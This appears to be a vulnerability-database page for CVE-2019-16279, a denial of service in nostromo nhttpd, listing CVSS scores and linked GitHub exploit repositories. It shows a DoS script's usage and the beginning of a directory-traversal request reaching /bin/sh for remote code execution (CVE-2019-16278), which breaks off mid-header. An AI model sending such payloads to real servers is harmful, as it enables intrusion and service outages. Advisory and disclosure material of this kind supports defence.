CVE-2019-16279

Published: 14/10/2019 Updated: 21/10/2019
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 446
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

A memory error in the function SSL_accept in nostromo nhttpd up to and including 1.9.6 allows a malicious user to trigger a denial of service via a crafted HTTP request.

Vulnerable Product

nazgul nostromo nhttpd

Github Repositories

(CVE-2019-16279)dos

This bug exploits a memory error when sending too many \r\n in a single connection.

Example:

    $ curl 127.0.0.1:8080
    HELLO!
    $ ./CVE-2019-16279.sh 127.0.0.1 8080
    $ curl 127.0.0.1:8080
    curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

Directory transversal to remote code execution

Exploits for CVE-2019-16278 and CVE-2019-16279

Nostromo httpd is prone to 2 critical vulnerabilities for versions <= 1.9.6 (0day =]). The first one is an RCE through directory transversal, the second one is a DoS.

CVE-2019-16278 - Directory transversal to remote code execution

    POST /%0d/%0d/%0d/%0d/bin/sh HTTP/1.0
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 1